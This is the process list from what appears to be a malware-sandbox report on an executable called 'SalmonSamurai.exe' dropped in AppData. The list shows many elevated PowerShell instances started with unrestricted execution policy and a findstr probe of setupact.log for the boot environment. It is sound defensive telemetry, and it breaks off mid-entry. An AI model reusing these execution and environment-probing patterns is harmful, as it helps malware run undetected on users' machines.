                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                                                                                              Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:17
                                                                                                                                                                                                                                              Start time:12:24:27
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                                                                                              Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:18
                                                                                                                                                                                                                                              Start time:12:24:27
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:19
                                                                                                                                                                                                                                              Start time:12:24:27
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                                                                                              Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:20
                                                                                                                                                                                                                                              Start time:12:24:27
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:21
                                                                                                                                                                                                                                              Start time:12:24:27
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:22
                                                                                                                                                                                                                                              Start time:12:24:28
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\jwsvgxfvwjmqrcpj" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1876 --field-trial-handle=1880,i,15145349905325196454,8933157076268643117,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
                                                                                                                                                                                                                                              Imagebase:0x7ff752ef0000
                                                                                                                                                                                                                                              File size:160'143'360 bytes
                                                                                                                                                                                                                                              MD5 hash:6EA18AE76085155E2681CCA92745A9AF
                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:23
                                                                                                                                                                                                                                              Start time:12:24:34
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\jwsvgxfvwjmqrcpj" --mojo-platform-channel-handle=2076 --field-trial-handle=1880,i,15145349905325196454,8933157076268643117,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
                                                                                                                                                                                                                                              Imagebase:0x7ff752ef0000
                                                                                                                                                                                                                                              File size:160'143'360 bytes
                                                                                                                                                                                                                                              MD5 hash:6EA18AE76085155E2681CCA92745A9AF
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:24
                                                                                                                                                                                                                                              Start time:12:24:46
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /d /s /c "findstr /C:"Detected boot environment" "%windir%\Panther\setupact.log""
                                                                                                                                                                                                                                              Imagebase:0x7ff6d8bd0000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:25
                                                                                                                                                                                                                                              Start time:12:24:46
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:26
                                                                                                                                                                                                                                              Start time:12:24:46
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\findstr.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:findstr /C:"Detected boot environment" "C:\Windows\Panther\setupact.log"
                                                                                                                                                                                                                                              Imagebase:0x7ff68d280000
                                                                                                                                                                                                                                              File size:36'352 bytes
                                                                                                                                                                                                                                              MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:27
                                                                                                                                                                                                                                              Start time:12:24:47
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                                                                                              Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:28
                                                                                                                                                                                                                                              Start time:12:24:47
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                                                                                              Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:29
                                                                                                                                                                                                                                              Start time:12:24:47
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:30
                                                                                                                                                                                                                                              Start time:12:24:47
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                                                                                              Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:31
                                                                                                                                                                                                                                              Start time:12:24:47
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:32
                                                                                                                                                                                                                                              Start time:12:24:47
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                                                                                              Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:33
                                                                                                                                                                                                                                              Start time:12:24:47
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                                                                                              Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:34
                                                                                                                                                                                                                                              Start time:12:24:47
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:35
                                                                                                                                                                                                                                              Start time:12:24:47
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                                                                                              Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:36
                                                                                                                                                                                                                                              Start time:12:24:47
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:37
                                                                                                                                                                                                                                              Start time:12:24:47
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:38
                                                                                                                                                                                                                                              Start time:12:24:47
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                                                                                              Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:39
                                                                                                                                                                                                                                              Start time:12:24:47
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:40
                                                                                                                                                                                                                                              Start time:12:24:47
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:41
                                                                                                                                                                                                                                              Start time:12:24:53
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                                                                                              Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:42
                                                                                                                                                                                                                                              Start time:12:24:53
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:43
                                                                                                                                                                                                                                              Start time:12:24:55
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                                                                                              Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:44
                                                                                                                                                                                                                                              Start time:12:24:55
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:45
                                                                                                                                                                                                                                              Start time:12:24:58
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                                                                                              Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:46
                                                                                                                                                                                                                                              Start time:12:24:58
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                                                                                              Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:47
                                                                                                                                                                                                                                              Start time:12:24:58
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:48
                                                                                                                                                                                                                                              Start time:12:24:58
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                                                                                              Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:49
                                                                                                                                                                                                                                              Start time:12:24:58
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:50
                                                                                                                                                                                                                                              Start time:12:24:58
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                                                                                              Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:51
                                                                                                                                                                                                                                              Start time:12:24:58
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
